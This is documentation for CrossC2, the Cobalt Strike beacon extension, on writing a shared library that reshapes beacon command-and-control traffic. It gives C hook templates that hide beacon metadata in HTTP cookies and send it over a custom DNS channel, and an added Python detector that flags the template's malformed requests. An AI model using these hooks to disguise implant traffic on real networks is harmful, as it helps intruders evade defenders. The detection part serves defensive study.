Custom communication protocol

CrossC2 exposes a communication protocol API that can be implemented either to apply C2Profile settings or to define a custom protocol.

After writing the protocol implementation, compile it into a dynamic library with gcc/clang test.c -fPIC -shared -o. When generating a beacon, use the rebind_dynamic_lib option in cna or genCrossC2 to specify that library; the generated beacon then sends its communication packets according to the protocol implementation in the specified library.

HTTPs communication template modification

The hooks below correspond to the 4 setting options in C2Profile:

http-get {
    client(send) { metadata{} }
    server(recv) { output{} }
}
http-post {
    client(send) {
        id {}
        output {}
    }
    server(recv) { output{} }
}

void (*cc2_rebind_http_get_send)(char *reqData, char **outputData, long long *outputData_len);
void (*cc2_rebind_http_get_recv)(char *resData, long long resData_len, char **outputData, long long *outputData_len);
void (*cc2_rebind_http_post_send)(char *reqData, char *beaconID, char **outputData, long long *outputData_len);
void (*cc2_rebind_http_post_recv)(char *resData, long long resData_len, char **outputData, long long *outputData_len);

cc2_rebind_http_x_send series functions:
    Wrap the incoming base64(metadata) data and return the complete HTTP request data
    `*reqData` is the base64-encoded data to send (metadata field)       - C2Profile http-get { client { (metadata) } }
    `**outputData` returns the actual HTTP content that needs to be sent

cc2_rebind_http_x_recv series functions:
    Parse the incoming HTTP response data and return the base64(output) data
    `*resData` is the complete HTTP content returned by the server
    `**outputData` returns the actual content carried in the HTTP content (the base64-encoded output field)     - C2Profile http-get { server { (output) } }

Communication protocol customization

void (*cc2_rebind_get_protocol)(char *reqData, char **outputData, long long *outputData_len);
void (*cc2_rebind_post_protocol)(char *reqData, char *beaconID, char **outputData, long long *outputData_len);

cc2_rebind_x_protocol series functions:
    Send the incoming raw data over the custom channel, receive the reply, and return the resulting base64(output) data
    `*reqData` is the base64-encoded data to send (metadata field / id + output field)
    `**outputData` is the base64-encoded server response data (output field)


HTTPs communication template customization:

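#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void cc2_rebind_http_get_send(char *reqData, char **outputData, long long *outputData_len) {
    printf("------ custom http get send ------\n");
    const char *requestTemplate = "GET /%s HTTP/1.1\r\n"
        "Accept: gzip, deflate\r\n"
        "User-Agent: cc2_rebind_http_get_send\r\n"
        "Cookie: %s\r\n"
        "Connection: cc2_rebind_http_get_send\r\n\r\n";
    char postPayload[20000];
    // Bounded write: reqData is caller-supplied, so plain sprintf could overflow postPayload
    int written = snprintf(postPayload, sizeof(postPayload), requestTemplate, "test", reqData);
    if (written < 0 || (size_t)written >= sizeof(postPayload)) {
        *outputData = NULL;   // request does not fit in the buffer: return no data
        *outputData_len = 0;
        return;
    }

    // Write the generated HTTP data to outputData
    *outputData_len = written;
    *outputData = (char *)calloc(1, *outputData_len + 1);
    if (*outputData == NULL) { *outputData_len = 0; return; }
    memcpy(*outputData, postPayload, *outputData_len);
}
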

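// find_pay is not defined on this page; this prototype assumes a helper that
// returns a pointer to the NUL-terminated payload inside the response.
char *find_pay(char *rawData, long long rawData_len);

void cc2_rebind_http_get_recv(char *rawData, long long rawData_len, char **outputData, long long *outputData_len) {
    printf("------ custom http get recv ------\n");

    // Example rawData:
    //   HTTP/1.1 200 OK
    //   Date: Tue, 26 May 2020 10:12:28 GMT
    //   Server: CC2_server
    //   Content-Length: 32
    //   Connection: close
    //   Content-Type: text/html; charset=iso-8859-1

    char *payload = find_pay(rawData, rawData_len); // return "XXXXZZZZXXXXAAAZZ=="

    // Copy the extracted payload to outputData
    *outputData_len = strlen(payload);
    *outputData = (char *)calloc(1, *outputData_len + 1);
    if (*outputData == NULL) { *outputData_len = 0; return; }
    memcpy(*outputData, payload, *outputData_len);
}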
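
For detection work, note that a request built from the sample `cc2_rebind_http_get_send` template above is malformed in ways ordinary clients are not: an HTTP/1.1 request with no Host header, content codings in `Accept`, a Cookie that is a bare base64 value, and a `Connection` option that names nothing. The Python below is an added example, not part of CrossC2 or the original page; the function names, check names and both sample requests are constructed here, and a beacon built with a different template needs different checks.

```python
import re

# Widely used connection options; per RFC 7230 section 6.1 any other token
# normally names a hop-by-hop header carried in the same message.
KNOWN_CONNECTION = {"keep-alive", "close", "upgrade"}
BARE_B64 = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

def parse_request(raw: bytes):
    """Split a raw HTTP request into (request_line, {lowercased header: value})."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers

def template_anomalies(raw: bytes):
    """Return the names of the checks that the request fails, in a fixed order."""
    request_line, h = parse_request(raw)
    found = []
    if request_line.endswith("HTTP/1.1") and "host" not in h:
        found.append("http11-without-host")
    accept = [v.strip() for v in h.get("accept", "").split(",") if v.strip()]
    if accept and not any("/" in v for v in accept):
        found.append("accept-has-no-media-type")      # e.g. "gzip, deflate"
    if BARE_B64.fullmatch(h.get("cookie", "")):
        found.append("cookie-is-bare-base64")         # no name=value pair
    tokens = [t.strip().lower() for t in h.get("connection", "").split(",")]
    if any(t and t not in KNOWN_CONNECTION and t not in h for t in tokens):
        found.append("connection-unknown-option")
    return found

# Constructed samples: the first fills the page's template with a made-up
# Cookie value, the second is an ordinary browser-style request.
TEMPLATE_REQ = (b"GET /test HTTP/1.1\r\nAccept: gzip, deflate\r\n"
                b"User-Agent: cc2_rebind_http_get_send\r\n"
                b"Cookie: QUFBQUFBQUFBQUFBQUFBQQ==\r\n"
                b"Connection: cc2_rebind_http_get_send\r\n\r\n")
NORMAL_REQ = (b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
              b"Accept: text/html,*/*;q=0.8\r\nAccept-Encoding: gzip, deflate\r\n"
              b"Cookie: session=QUFBQUFBQUFBQUFBQUFBQQ==\r\n"
              b"Connection: keep-alive\r\n\r\n")

if __name__ == "__main__":
    print(template_anomalies(TEMPLATE_REQ))
    print(template_anomalies(NORMAL_REQ))
```
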


Communication protocol customization

void cc2_rebind_get_protocol(char *reqData, char **outputData, long long *outputData_len) {
    printf("------ custom get protocol ------\n");
    // sendDNS is not defined on this page; it stands for the custom transport routine
    sendDNS("", 53, 1, reqData, strlen(reqData), outputData, outputData_len);
    if (*outputData_len > 0) {
        // outputData_len is a long long, so it is printed with %lld
        printf("cobaltstrike cc2_server response(%lld): \n", *outputData_len);
    }
    printf("------ custom protocol ------\n");
}
